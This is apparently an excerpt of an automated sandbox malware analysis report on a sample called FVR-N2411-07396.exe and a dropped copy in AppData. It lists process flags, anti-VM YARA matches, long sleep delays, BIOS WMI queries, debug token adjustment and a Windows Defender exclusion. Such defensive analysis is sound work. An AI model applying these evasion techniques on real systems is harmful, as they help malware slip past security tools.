Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 2840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 29E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 49E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 8B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 9B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: 9D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Memory allocated: AD80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: 87B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: 8260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: 97B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Memory allocated: A7B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7881			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1691			Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe TID: 2680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe TID: 3720	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe TID: 6640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: FVR-N2411-07396.exe, 00000000.00000002.2072739008.00000000089E0000.00000004.08000000.00040000.00000000.sdmp, FVR-N2411-07396.exe, 00000000.00000002.2053905676.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEMu6JdlAP
Source: FVR-N2411-07396.exe, 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZeJFfrYmOnJKS.exe, 0000000C.00000002.2128021520.0000000001498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Code function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]

12_2_0040317B

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Code function: 12_2_00402B7C GetProcessHeap,HeapAlloc,

12_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

